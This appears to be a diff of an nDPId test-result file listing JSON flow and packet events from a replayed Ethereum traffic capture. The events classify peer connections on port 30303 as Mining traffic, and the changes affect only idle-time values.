-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1578508365239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQhrAqAG4neaYV91Sdl9OT1qyAAAAALAC\/\/+H9wAAAgQFtAEDAwUBAQgKItiW2wAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365271,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365271,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1189,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1578508365271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365271,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLavAqAG4M6EXDN1Udl9XVw7PAAAAALAC\/\/+2RQAAAgQFtAEDAwUBAQgKItiW9wAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365279,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365279,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1578508365279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365279,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxArAqAG4NAmARN1Vdl\/t7etbAAAAALAC\/\/\/ZeQAAAgQFtAEDAwUBAQgKItiW\/gAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365295,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365295,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1208,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1578508365295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365295,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbF\/AqAG4I+XoE91Wdl\/o6wkCAAAAALAC\/\/9pGwAAAgQFtAEDAwUBAQgKItiXDAAAAAAEAgAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365300,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365300,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1578508365300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGD8rAqAG4fNnrtN1Xdl9L2gYiAAAAALAC\/\/+scgAAAgQFtAEDAwUBAQgKItiXEAAAAAAEAgAA"} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACymwlAACMRP1cS26efwKgBuHZfdl8AnsFrVj4puAH6ZgARKbHJmno0oUTDSx6ME3WyQvgYFdLFf82IMxF0n+9n2kTCv9WKp0W5OWAeoQIHesUQlOhBZUox8XuUKjSw2r\/cLxIh6clEUwjRudwx4mptlXU2a3WMaDxBAALzy4RPFs69gun3gnZfoAez3OWZbA2U21K6mmqEcXi9Zewq23MX\/wTlxWTRncmbhF4WIGEK"} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -248,187 +248,187 @@ 00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} 